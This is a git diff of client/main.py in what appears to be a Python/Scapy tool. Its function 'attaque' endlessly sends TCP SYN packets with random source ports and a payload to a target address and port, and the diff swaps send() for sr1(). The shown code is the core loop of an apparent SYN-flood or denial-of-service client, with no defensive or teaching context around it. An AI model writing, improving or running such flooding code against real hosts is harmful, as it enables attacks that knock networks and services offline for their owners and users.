diff --git a/client/main.py b/client/main.py index e81e880..caca6f5 100644 --- a/client/main.py +++ b/client/main.py @@ -20,7 +20,7 @@ def attaque(): while True: requete = L[r.randint(0, 2)] paquet = IP(dst=adresse) / TCP(dport=port, sport=RandShort(), flags="S") / Raw(load=requete) - send(paquet, verbose=True) + sr1(paquet, verbose=True) if __name__ == "__main__": attaque()